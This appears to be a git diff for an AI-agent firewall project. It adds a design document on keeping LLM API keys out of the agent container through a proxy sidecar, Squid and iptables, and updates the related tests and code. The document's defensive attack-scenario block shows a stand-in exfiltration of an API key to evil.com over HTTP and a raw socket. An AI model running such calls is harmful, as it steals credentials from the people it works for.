+β - ANTHROPIC_API_KEY=sk-ant-... β
+β - OPENAI_API_KEY=sk-... β
+β β
+β Passes keys only to api-proxy container β
+ββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββ
+ β
+ βββββββββββββββββββββββββββββββββββββββ
+ β β
+ βΌ βΌ
+ββββββββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ
+β API Proxy Container β β Agent Container β
+β 172.30.0.30 β β 172.30.0.20 β
+β β β β
+β Environment: β β Environment: β
+β β OPENAI_API_KEY=sk-... β β β No ANTHROPIC_API_KEY β
+β β ANTHROPIC_API_KEY=sk-ant-... β β β No OPENAI_API_KEY β
+β β HTTP_PROXY=172.30.0.10:3128 β β β ANTHROPIC_BASE_URL= β
+β β HTTPS_PROXY=172.30.0.10:3128 β β http://172.30.0.30:10001 β
+β β β β OPENAI_BASE_URL= β
+β Ports: β β http://172.30.0.30:10000 β
+β - 10000 (OpenAI proxy) βββββββββ β GITHUB_TOKEN=ghp_... β
+β - 10001 (Anthropic proxy) β β (protected by one-shot-token) β
+β β β β
+β Injects auth headers: β β User command execution: β
+β - x-api-key: sk-ant-... β β claude-code, copilot, etc. β
+β - Authorization: Bearer sk-... β ββββββββββββββββββββββββββββββββββββ
+ββββββββββββββββββ¬ββββββββββββββββββ
+ β
+ βΌ
+ββββββββββββββββββββββββββββββββββββ
+β Squid Proxy Container β
+β 172.30.0.10:3128 β
+β β
+β Domain whitelist enforcement: β
+β β api.anthropic.com β
+β β api.openai.com β
+β β *.exfiltration.com (blocked) β
+β β
+ββββββββββββββββββ¬ββββββββββββββββββ
+ β
+ βΌ
+ Internet (api.anthropic.com)
+```
+
+## Token Flow: Step-by-Step
+
+### 1. Token Sources and Initial Handling
+
+**Location:** `src/cli.ts:988-989`
+
+When AWF is invoked with `--enable-api-proxy`:
+
+```bash
+export ANTHROPIC_API_KEY="sk-ant-..."
+export OPENAI_API_KEY="sk-..."
+
+awf --enable-api-proxy --allow-domains api.anthropic.com \
+ "claude-code --prompt 'write hello world'"
+```
+
+The CLI reads these API keys from the **host environment** at startup.
+
+### 2. Docker Compose Configuration
+
+**Location:** `src/docker-manager.ts:922-978`
+
+AWF generates a Docker Compose configuration with three services:
+
+#### API Proxy Service Configuration
+
+```yaml
+api-proxy:
+ environment:
+ # API keys passed ONLY to this container
+ - ANTHROPIC_API_KEY=sk-ant-...
+ - OPENAI_API_KEY=sk-...
+ # Routes all traffic through Squid
+ - HTTP_PROXY=http://172.30.0.10:3128
+ - HTTPS_PROXY=http://172.30.0.10:3128
+ networks:
+ awf-net:
+ ipv4_address: 172.30.0.30
+```
+
+#### Agent Service Configuration
+
+```yaml
+agent:
+ environment:
+ # NO API KEYS - only base URLs pointing to api-proxy
+ - ANTHROPIC_BASE_URL=http://172.30.0.30:10001
+ - OPENAI_BASE_URL=http://172.30.0.30:10000
+ # GitHub token for MCP servers (protected separately)
+ - GITHUB_TOKEN=ghp_...
+ networks:
+ awf-net:
+ ipv4_address: 172.30.0.20
+```
+
+**Key Security Decision:** API keys are **intentionally excluded** from the agent container environment (see lines 323-331, 404, and 413-417 in `docker-manager.ts`).
+
+### 3. API Proxy: Credential Injection Layer
+
+**Location:** `containers/api-proxy/server.js`
+
+The api-proxy container runs two HTTP servers:
+
+#### Port 10000: OpenAI Proxy
+
+```javascript
+// Read API key from environment (line 46)
+const OPENAI_API_KEY = process.env.OPENAI_API_KEY;
+
+// Create proxy agent to route through Squid (lines 34-38)
+const proxyAgent = new HttpsProxyAgent({
+ host: process.env.SQUID_PROXY_HOST,
+ port: parseInt(process.env.SQUID_PROXY_PORT, 10),
+});
+
+// Handle incoming request from agent (lines 175-184)
+http.createServer((clientReq, clientRes) => {
+ // Strip any client-supplied auth headers (security)
+ delete clientReq.headers['authorization'];
+
+ // Inject actual API key
+ const headers = {
+ ...clientReq.headers,
+ 'Authorization': `Bearer ${OPENAI_API_KEY}`,
+ 'Host': 'api.openai.com'
+ };
+
+ // Forward to real API through Squid
+ https.request({
+ hostname: 'api.openai.com',
+ method: clientReq.method,
+ path: clientReq.url,
+ headers: headers,
+ agent: proxyAgent // Routes through Squid
+ });
+});
+```
+
+#### Port 10001: Anthropic Proxy
+
+```javascript
+// Read API key from environment (line 47)
+const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
+
+// Handle incoming request from agent (lines 218-224)
+http.createServer((clientReq, clientRes) => {
+ // Strip any client-supplied auth headers (security)
+ delete clientReq.headers['x-api-key'];
+
+ // Inject actual API key
+ const headers = {
+ ...clientReq.headers,
+ 'x-api-key': ANTHROPIC_API_KEY,
+ 'Host': 'api.anthropic.com'
+ };
+
+ // Forward to real API through Squid
+ https.request({
+ hostname: 'api.anthropic.com',
+ method: clientReq.method,
+ path: clientReq.url,
+ headers: headers,
+ agent: proxyAgent // Routes through Squid
+ });
+});
+```
+
+**Security Feature:** The proxy strips any authentication headers sent by the agent (lines 23-36) and only uses the key from its own environment. This prevents a compromised agent from injecting malicious credentials.
+
+### 4. Agent Container: SDK Transparent Redirection
+
+**Location:** Agent container environment configuration
+
+The agent container sees these environment variables:
+
+```bash
+ANTHROPIC_BASE_URL=http://172.30.0.30:10001
+OPENAI_BASE_URL=http://172.30.0.30:10000
+```
+
+These are **standard environment variables** recognized by:
+- Anthropic Python SDK (`anthropic` package)
+- Anthropic TypeScript SDK (`@anthropic-ai/sdk`)
+- OpenAI Python SDK (`openai` package)
+- OpenAI Node.js SDK (`openai`)
+- Claude Code CLI
+- Codex CLI
+
+When the agent code makes an API call:
+
+**Example 1: Anthropic/Claude**
+
+```python
+# Example: Claude Code or custom agent using Anthropic SDK
+import anthropic
+
+client = anthropic.Anthropic()
+# SDK reads ANTHROPIC_BASE_URL from environment
+# Sends request to http://172.30.0.30:10001 instead of api.anthropic.com
+
+response = client.messages.create(
+ model="claude-sonnet-4",
+ messages=[{"role": "user", "content": "Hello"}]
+)
+```
+
+**Example 2: OpenAI/Codex**
+
+```python
+# Example: Codex or custom agent using OpenAI SDK
+import openai
+
+client = openai.OpenAI()
+# SDK reads OPENAI_BASE_URL from environment
+# Sends request to http://172.30.0.30:10000 instead of api.openai.com
+
+response = client.chat.completions.create(
+ model="gpt-4",
+ messages=[{"role": "user", "content": "Hello"}]
+)
+```
+
+The SDKs **automatically use the base URL** without requiring any code changes. The agent thinks it's talking to the real API, but requests are routed through the secure api-proxy sidecar.
+
+### 5. Network Routing: iptables Rules
+
+**Location:** `containers/agent/setup-iptables.sh:131-134, 275`
+
+Special iptables rules ensure proper routing:
+
+```bash
+# Allow direct access to api-proxy (bypass normal proxy redirection)
+if [ -n "$AWF_API_PROXY_IP" ]; then
+ echo "[iptables] Allow traffic to API proxy sidecar (${AWF_API_PROXY_IP})..."
+ iptables -t nat -A OUTPUT -d "$AWF_API_PROXY_IP" -j RETURN
+fi
+
+# ... later ...
+
+# Accept TCP traffic to api-proxy
+iptables -A OUTPUT -p tcp -d "$AWF_API_PROXY_IP" -j ACCEPT
+```
+
+Without these rules, traffic to `172.30.0.30` would be redirected to Squid via NAT rules, creating a routing loop.
+
+**Traffic Flow for Anthropic/Claude:**
+
+1. Agent SDK makes HTTP request to `172.30.0.30:10001`
+2. iptables allows direct TCP connection (no redirection)
+3. API proxy receives request on port 10001
+4. API proxy injects `x-api-key: sk-ant-...` header
+5. API proxy forwards to `api.anthropic.com` via Squid (using `HttpsProxyAgent`)
+6. Squid enforces domain whitelist (only `api.anthropic.com` allowed)
+7. Squid forwards to real API endpoint
+8. Response flows back: API β Squid β api-proxy β agent
+
+**Traffic Flow for OpenAI/Codex:**
+
+1. Agent SDK makes HTTP request to `172.30.0.30:10000`
+2. iptables allows direct TCP connection (no redirection)
+3. API proxy receives request on port 10000
+4. API proxy injects `Authorization: Bearer sk-...` header
+5. API proxy forwards to `api.openai.com` via Squid (using `HttpsProxyAgent`)
+6. Squid enforces domain whitelist (only `api.openai.com` allowed)
+7. Squid forwards to real API endpoint
+8. Response flows back: API β Squid β api-proxy β agent
+
+### 6. Squid Proxy: Domain Filtering
+
+**Location:** `src/squid-config.ts:462-465`
+
+When api-proxy is enabled, Squid configuration includes:
+
+```squid
+# Allow api-proxy ports
+acl Safe_ports port 10000
+acl Safe_ports port 10001
+
+# Allow api-proxy IP address (dst ACL for IP addresses)
+acl allowed_ips dst 172.30.0.30
+http_access allow allowed_ips
+
+# Allow API domains (dstdomain ACL for hostnames)
+acl allowed_domains dstdomain api.anthropic.com
+acl allowed_domains dstdomain api.openai.com
+http_access allow CONNECT allowed_domains
+```
+
+The api-proxy container's environment forces all outbound traffic through Squid:
+
+```yaml
+environment:
+ HTTP_PROXY: http://172.30.0.10:3128
+ HTTPS_PROXY: http://172.30.0.10:3128
+```
+
+Even if a compromised api-proxy container tried to connect to a malicious domain, Squid would block it.
+
+## Additional Token Protection Mechanisms
+
+### One-Shot Token Library
+
+**Location:** `containers/agent/one-shot-token/`
+
+While API keys don't exist in the agent container, other tokens (like `GITHUB_TOKEN`) do. AWF uses an LD_PRELOAD library to protect these:
+
+```c
+// Intercept getenv() calls
+char* getenv(const char* name) {
+ if (is_protected_token(name)) {
+ // First access: return value and cache it
+ char* value = real_getenv(name);
+ if (value) {
+ cache_token(name, value);
+ unsetenv(name); // Remove from environment
+ }
+ return value;
+ }
+ return real_getenv(name);
+}
+
+// Subsequent accesses return cached value
+// /proc/self/environ no longer shows the token
+```
+
+**Protected tokens by default:**
+- `ANTHROPIC_API_KEY`, `CLAUDE_API_KEY` (though not passed to agent)
+- `OPENAI_API_KEY`, `OPENAI_KEY`
+- `GITHUB_TOKEN`, `GH_TOKEN`, `COPILOT_GITHUB_TOKEN`
+- `GITHUB_API_TOKEN`, `GITHUB_PAT`, `GH_ACCESS_TOKEN`
+- `CODEX_API_KEY`
+
+### Entrypoint Token Cleanup
+
+**Location:** `containers/agent/entrypoint.sh:145-176`
+
+The entrypoint (PID 1) unsets sensitive tokens from its own environment after a 5-second grace period:
+
+```bash
+unset_sensitive_tokens() {
+ local SENSITIVE_TOKENS=(
+ "ANTHROPIC_API_KEY" "CLAUDE_API_KEY" "CLAUDE_CODE_OAUTH_TOKEN"
+ "OPENAI_API_KEY" "OPENAI_KEY"
+ "GITHUB_TOKEN" "GH_TOKEN" "COPILOT_GITHUB_TOKEN"
+ "GITHUB_API_TOKEN" "GITHUB_PAT" "GH_ACCESS_TOKEN"
+ "GITHUB_PERSONAL_ACCESS_TOKEN"
+ "CODEX_API_KEY"
+ )
+
+ for token in "${SENSITIVE_TOKENS[@]}"; do
+ if [ -n "${!token}" ]; then
+ unset "$token"
+ echo "[entrypoint] Unset $token from /proc/1/environ" >&2
+ fi
+ done
+}
+
+# Wait 5 seconds for child processes to start and read tokens
+sleep 5
+unset_sensitive_tokens &
+```
+
+This prevents tokens from being visible in `/proc/1/environ` after the agent starts.
+
+## Security Properties
+
+### Credential Isolation
+
+**Primary Security Guarantee:** API keys **never exist** in the agent container environment.
+
+- Agent code cannot read API keys via `getenv()` or `os.getenv()`
+- API keys are not visible in `/proc/self/environ` or `/proc/*/environ`
+- Compromised agent code cannot exfiltrate API keys (they don't exist)
+- Only the api-proxy container has access to API keys
+
+### Network Isolation
+
+**Defense in Depth:**
+
+1. **Layer 1:** Agent cannot make direct internet connections (iptables blocks non-whitelisted traffic)
+2. **Layer 2:** Agent can only reach api-proxy IP (`172.30.0.30`) for API calls
+3. **Layer 3:** API proxy routes ALL traffic through Squid (enforced via `HTTP_PROXY` env)
+4. **Layer 4:** Squid enforces domain whitelist (only `api.anthropic.com`, `api.openai.com`)
+5. **Layer 5:** Host-level iptables provide additional egress control
+
+**Attack Scenario: What if the agent tries to bypass the proxy?**
+
+```python
+# Compromised agent tries to exfiltrate API key
+import requests
+
+# Attempt 1: Try to read API key
+api_key = os.getenv("ANTHROPIC_API_KEY")
+# Result: None (key doesn't exist in agent environment)
+
+# Attempt 2: Try to connect to malicious domain
+requests.post("https://evil.com/exfiltrate", data={"key": api_key})
+# Result: iptables blocks connection (evil.com not in whitelist)
+
+# Attempt 3: Try to bypass Squid
+import socket
+sock = socket.socket()
+sock.connect(("evil.com", 443))
+# Result: iptables blocks connection (must go through Squid)
+```
+
+All attempts fail due to the multi-layered defense.
+
+### Capability Restrictions
+
+**API Proxy Container:**
+
+```yaml
+security_opt:
+ - no-new-privileges:true
+cap_drop:
+ - ALL
+mem_limit: 512m
+pids_limit: 100
+```
+
+Even if exploited, the api-proxy has no elevated privileges and limited resources.
+
+**Agent Container:**
+
+- Starts with `CAP_NET_ADMIN` for iptables setup
+- Drops `CAP_NET_ADMIN` via `capsh --drop=cap_net_admin` before executing user command
+- Prevents malicious code from modifying firewall rules
+
+## Configuration Requirements
+
+### Enabling API Proxy Mode
+
+**Example 1: Using with Claude Code**
+
+```bash
+# Export Anthropic API key on host
+export ANTHROPIC_API_KEY="sk-ant-api03-..."
+
+# Run AWF with --enable-api-proxy flag
+awf --enable-api-proxy \
+ --allow-domains api.anthropic.com \
+ "claude-code --prompt 'Hello world'"
+```
+
+**Example 2: Using with Codex**
+
+```bash
+# Export OpenAI API key on host
+export OPENAI_API_KEY="sk-..."
+
+# Run AWF with --enable-api-proxy flag
+awf --enable-api-proxy \
+ --allow-domains api.openai.com \
+ "codex --prompt 'Hello world'"
+```
+
+**Example 3: Using both providers**
+
+```bash
+# Export both API keys on host
+export ANTHROPIC_API_KEY="sk-ant-api03-..."
+export OPENAI_API_KEY="sk-..."
+
+# Run AWF with --enable-api-proxy flag, allowing both domains
+awf --enable-api-proxy \
+ --allow-domains api.anthropic.com,api.openai.com \
+ "your-multi-llm-agent"
+```
+
+### Domain Whitelist
+
+When using api-proxy, you must allow the API domains:
+
+```bash
+--allow-domains api.anthropic.com,api.openai.com
+```
+
+Without these, Squid will block the api-proxy's outbound connections.
+
+### NO_PROXY Configuration
+
+**Location:** `src/docker-manager.ts:969`
+
+The agent container's `NO_PROXY` variable includes:
+
+```bash
+NO_PROXY=127.0.0.1,localhost,172.30.0.30,172.30.0.0/16,api-proxy
+```
+
+This ensures:
+- Local MCP servers (stdio-based) can communicate via localhost
+- Agent can reach api-proxy directly without going through a proxy
+- Container-to-container communication works properly
+
+## Comparison: With vs Without API Proxy
+
+### Without API Proxy (Direct Authentication)
+
+```
+βββββββββββββββββββ
+β Agent Container β
+β β
+β Environment: β
+β β ANTHROPIC_API_KEY=sk-ant-... (VISIBLE)
+β β
+β Risk: Token β
+β visible in β
+β /proc/environ β
+ββββββββββ¬βββββββββ
+ β
+ βΌ
+ Squid Proxy
+ β
+ βΌ
+ api.anthropic.com
+```
+
+**Security Risk:** If the agent is compromised, the attacker can read the API key from environment variables.
+
+### With API Proxy (Credential Isolation)
+
+```
+βββββββββββββββββββ ββββββββββββββββββ
+β Agent Container ββββββΆβ API Proxy β
+β β β β
+β Environment: β β Environment: β
+β β No API key β β β ANTHROPIC_API_KEY=sk-ant-...
+β β BASE_URL= β β (ISOLATED) β
+β 172.30.0.30 β β β
+βββββββββββββββββββ ββββββββββ¬ββββββββ
+ β
+ βΌ
+ Squid Proxy
+ β
+ βΌ
+ api.anthropic.com
+```
+
+**Security Improvement:** Compromised agent cannot access API keys (they don't exist in agent environment).
+
+## Key Files Reference
+
+| File | Purpose |
+|------|---------|
+| `src/cli.ts:988-989` | CLI reads API keys from host environment |
+| `src/docker-manager.ts:922-978` | Docker Compose generation, token routing logic |
+| `containers/api-proxy/server.js` | API proxy implementation (credential injection) |
+| `containers/agent/setup-iptables.sh:131-134, 275` | iptables rules for api-proxy routing |
+| `containers/agent/entrypoint.sh:145-176` | Entrypoint token cleanup |
+| `containers/agent/one-shot-token/` | LD_PRELOAD library for token protection |
+| `src/squid-config.ts:462-465` | Squid Safe_ports configuration for api-proxy |
+| `docs/api-proxy-sidecar.md` | User-facing API proxy documentation |
+| `docs/token-unsetting-fix.md` | Token cleanup implementation details |
+
+## Summary
+
+AWF implements **credential isolation** through architectural separation:
+
+1. **API keys live in api-proxy container only** (never in agent environment)
+2. **Agent uses standard SDK environment variables** (`*_BASE_URL`) to redirect traffic
+3. **API proxy injects credentials** and routes through Squid
+4. **Squid enforces domain whitelist** (only allowed API domains)
+5. **iptables enforces network isolation** (agent cannot bypass proxy)
+6. **Multiple token cleanup mechanisms** protect other credentials (GitHub tokens, etc.)
+
+This architecture provides **transparent operation** (SDKs work without code changes) while maintaining **strong security** (compromised agent cannot steal API keys).
diff --git a/package-lock.json b/package-lock.json
index 72a685fd..e8b1dca4 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -27,7 +27,7 @@
"@types/glob": "^9.0.0",
"@types/jest": "^30.0.0",
"@types/js-yaml": "^4.0.5",
- "@types/node": "^25.2.2",
+ "@types/node": "^25.2.3",
"@typescript-eslint/eslint-plugin": "^8.55.0",
"@typescript-eslint/parser": "^8.55.0",
"babel-jest": "^30.2.0",
diff --git a/package.json b/package.json
index 7e3bd725..c6cfee76 100644
--- a/package.json
+++ b/package.json
@@ -51,24 +51,24 @@
"@babel/preset-env": "^7.29.0",
"@commitlint/cli": "^20.4.1",
"@commitlint/config-conventional": "^20.4.1",
+ "@eslint/compat": "^2.0.0",
+ "@eslint/js": "^10.0.0",
"@types/glob": "^9.0.0",
"@types/jest": "^30.0.0",
"@types/js-yaml": "^4.0.5",
- "@types/node": "^25.2.2",
- "@eslint/compat": "^2.0.0",
- "@eslint/js": "^10.0.0",
+ "@types/node": "^25.2.3",
"@typescript-eslint/eslint-plugin": "^8.55.0",
"@typescript-eslint/parser": "^8.55.0",
- "globals": "^17.0.0",
- "typescript-eslint": "^8.0.0",
"babel-jest": "^30.2.0",
"eslint": "^10.0.0",
"eslint-plugin-security": "^3.0.1",
"glob": "^13.0.1",
+ "globals": "^17.0.0",
"husky": "^9.1.7",
"jest": "^30.2.0",
"ts-jest": "^29.4.6",
- "typescript": "^5.0.0"
+ "typescript": "^5.0.0",
+ "typescript-eslint": "^8.0.0"
},
"engines": {
"node": ">=20.12.0"
diff --git a/src/docker-manager.test.ts b/src/docker-manager.test.ts
index 0b91f7f3..ae42c01d 100644
--- a/src/docker-manager.test.ts
+++ b/src/docker-manager.test.ts
@@ -1545,12 +1545,13 @@ describe('docker-manager', () => {
expect(dependsOn['api-proxy'].condition).toBe('service_healthy');
});
- it('should set OPENAI_BASE_URL in agent when OpenAI key is provided', () => {
+ it('should not set OPENAI_BASE_URL in agent when OpenAI key is provided (temporarily disabled)', () => {
const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-key' };
const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
const agent = result.services.agent;
const env = agent.environment as Record;
- expect(env.OPENAI_BASE_URL).toBe('http://172.30.0.30:10000');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
});
it('should configure HTTP_PROXY and HTTPS_PROXY in api-proxy to route through Squid', () => {
@@ -1568,15 +1569,20 @@ describe('docker-manager', () => {
const agent = result.services.agent;
const env = agent.environment as Record;
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
});
- it('should set both BASE_URL variables when both keys are provided', () => {
+ it('should only set ANTHROPIC_BASE_URL when both keys are provided (OPENAI_BASE_URL temporarily disabled)', () => {
const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-openai-key', anthropicApiKey: 'sk-ant-test-key' };
const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
const agent = result.services.agent;
const env = agent.environment as Record;
- expect(env.OPENAI_BASE_URL).toBe('http://172.30.0.30:10000');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
});
it('should not set OPENAI_BASE_URL in agent when only Anthropic key is provided', () => {
@@ -1586,15 +1592,18 @@ describe('docker-manager', () => {
const env = agent.environment as Record;
expect(env.OPENAI_BASE_URL).toBeUndefined();
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
});
- it('should not set ANTHROPIC_BASE_URL in agent when only OpenAI key is provided', () => {
+ it('should not set ANTHROPIC_BASE_URL or OPENAI_BASE_URL in agent when only OpenAI key is provided (OPENAI_BASE_URL temporarily disabled)', () => {
const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-key' };
const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
const agent = result.services.agent;
const env = agent.environment as Record;
expect(env.ANTHROPIC_BASE_URL).toBeUndefined();
- expect(env.OPENAI_BASE_URL).toBe('http://172.30.0.30:10000');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
});
it('should set AWF_API_PROXY_IP in agent environment', () => {
@@ -1614,6 +1623,22 @@ describe('docker-manager', () => {
expect(env.no_proxy).toContain('172.30.0.30');
});
+ it('should set CLAUDE_CODE_API_KEY_HELPER when Anthropic key is provided', () => {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, anthropicApiKey: 'sk-ant-test-key' };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+ const env = agent.environment as Record;
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
+ });
+
+ it('should not set CLAUDE_CODE_API_KEY_HELPER when only OpenAI key is provided', () => {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-key' };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+ const env = agent.environment as Record;
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBeUndefined();
+ });
+
it('should not leak ANTHROPIC_API_KEY to agent when api-proxy is enabled', () => {
// Simulate the key being in process.env (as it would be in real usage)
const origKey = process.env.ANTHROPIC_API_KEY;
@@ -1627,6 +1652,97 @@ describe('docker-manager', () => {
expect(env.ANTHROPIC_API_KEY).toBeUndefined();
// Agent should have the BASE_URL to reach the sidecar instead
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ // Agent should have placeholder token for Claude Code compatibility
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ } finally {
+ if (origKey !== undefined) {
+ process.env.ANTHROPIC_API_KEY = origKey;
+ } else {
+ delete process.env.ANTHROPIC_API_KEY;
+ }
+ }
+ });
+
+ it('should not leak OPENAI_API_KEY to agent when api-proxy is enabled', () => {
+ // Simulate the key being in process.env (as it would be in real usage)
+ const origKey = process.env.OPENAI_API_KEY;
+ process.env.OPENAI_API_KEY = 'sk-secret-key';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-secret-key' };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+ const env = agent.environment as Record;
+ // Agent should NOT have the raw API key β only the sidecar gets it
+ expect(env.OPENAI_API_KEY).toBeUndefined();
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
+ } finally {
+ if (origKey !== undefined) {
+ process.env.OPENAI_API_KEY = origKey;
+ } else {
+ delete process.env.OPENAI_API_KEY;
+ }
+ }
+ });
+
+ it('should pass CODEX_API_KEY to agent even when api-proxy is enabled with envAll', () => {
+ // Simulate the key being in process.env AND envAll enabled
+ // CODEX_API_KEY is intentionally passed through (unlike other keys) for Codex agent compatibility
+ const origKey = process.env.CODEX_API_KEY;
+ process.env.CODEX_API_KEY = 'sk-codex-secret';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test', envAll: true };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+ const env = agent.environment as Record;
+ // CODEX_API_KEY is intentionally passed to agent for Codex compatibility
+ expect(env.CODEX_API_KEY).toBe('sk-codex-secret');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
+ } finally {
+ if (origKey !== undefined) {
+ process.env.CODEX_API_KEY = origKey;
+ } else {
+ delete process.env.CODEX_API_KEY;
+ }
+ }
+ });
+
+ it('should not leak OPENAI_API_KEY to agent when api-proxy is enabled with envAll', () => {
+ // Simulate envAll scenario (smoke-codex uses --env-all)
+ const origKey = process.env.OPENAI_API_KEY;
+ process.env.OPENAI_API_KEY = 'sk-openai-secret';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-openai-secret', envAll: true };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+ const env = agent.environment as Record;
+ // Even with envAll, agent should NOT have OPENAI_API_KEY when api-proxy is enabled
+ expect(env.OPENAI_API_KEY).toBeUndefined();
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
+ } finally {
+ if (origKey !== undefined) {
+ process.env.OPENAI_API_KEY = origKey;
+ } else {
+ delete process.env.OPENAI_API_KEY;
+ }
+ }
+ });
+
+ it('should not leak ANTHROPIC_API_KEY to agent when api-proxy is enabled with envAll', () => {
+ const origKey = process.env.ANTHROPIC_API_KEY;
+ process.env.ANTHROPIC_API_KEY = 'sk-ant-secret';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, anthropicApiKey: 'sk-ant-secret', envAll: true };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+ const env = agent.environment as Record;
+ // Even with envAll, agent should NOT have ANTHROPIC_API_KEY when api-proxy is enabled
+ expect(env.ANTHROPIC_API_KEY).toBeUndefined();
+ expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ // But should have placeholder token for Claude Code compatibility
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
} finally {
if (origKey !== undefined) {
process.env.ANTHROPIC_API_KEY = origKey;
diff --git a/src/docker-manager.ts b/src/docker-manager.ts
index 68d85507..5610729d 100644
--- a/src/docker-manager.ts
+++ b/src/docker-manager.ts
@@ -242,6 +242,12 @@ export function generateDockerCompose(
// Squid logs path: use proxyLogsDir if specified (direct write), otherwise workDir/squid-logs
const squidLogsPath = config.proxyLogsDir || `${config.workDir}/squid-logs`;
+ // API proxy logs path: if proxyLogsDir is specified, write to sibling directory
+ // Otherwise, write to workDir/api-proxy-logs (will be moved to /tmp after cleanup)
+ const apiProxyLogsPath = config.proxyLogsDir
+ ? path.join(path.dirname(config.proxyLogsDir), 'api-proxy-logs')
+ : path.join(config.workDir, 'api-proxy-logs');
+
// Build Squid volumes list
const squidVolumes = [
`${config.workDir}/squid.conf:/etc/squid/squid.conf:ro`,
@@ -320,6 +326,16 @@ export function generateDockerCompose(
'SUDO_GID', // Sudo metadata
]);
+ // When api-proxy is enabled, exclude API keys from agent environment
+ // (they are held securely in the api-proxy sidecar instead)
+ // Note: CODEX_API_KEY is intentionally NOT excluded - Codex needs direct credential access
+ if (config.enableApiProxy) {
+ EXCLUDED_ENV_VARS.add('OPENAI_API_KEY');
+ EXCLUDED_ENV_VARS.add('OPENAI_KEY');
+ EXCLUDED_ENV_VARS.add('ANTHROPIC_API_KEY');
+ EXCLUDED_ENV_VARS.add('CLAUDE_API_KEY');
+ }
+
// Start with required/overridden environment variables
// Use the real user's home (not /root when running with sudo)
const homeDir = getRealUserHome();
@@ -400,8 +416,11 @@ export function generateDockerCompose(
if (process.env.GITHUB_TOKEN) environment.GITHUB_TOKEN = process.env.GITHUB_TOKEN;
if (process.env.GH_TOKEN) environment.GH_TOKEN = process.env.GH_TOKEN;
if (process.env.GITHUB_PERSONAL_ACCESS_TOKEN) environment.GITHUB_PERSONAL_ACCESS_TOKEN = process.env.GITHUB_PERSONAL_ACCESS_TOKEN;
- // Anthropic API key for Claude Code β skip when api-proxy is enabled
- // (the sidecar holds the key; the agent uses ANTHROPIC_BASE_URL instead)
+ // API keys for LLM providers β skip when api-proxy is enabled
+ // (the sidecar holds the keys; the agent uses *_BASE_URL instead)
+ // Exception: CODEX_API_KEY is always passed through for Codex agent compatibility
+ if (process.env.OPENAI_API_KEY && !config.enableApiProxy) environment.OPENAI_API_KEY = process.env.OPENAI_API_KEY;
+ if (process.env.CODEX_API_KEY) environment.CODEX_API_KEY = process.env.CODEX_API_KEY;
if (process.env.ANTHROPIC_API_KEY && !config.enableApiProxy) environment.ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
if (process.env.USER) environment.USER = process.env.USER;
if (process.env.TERM) environment.TERM = process.env.TERM;
@@ -531,6 +550,24 @@ export function generateDockerCompose(
// This is safe as ~/.claude contains only Claude-specific state, not credentials
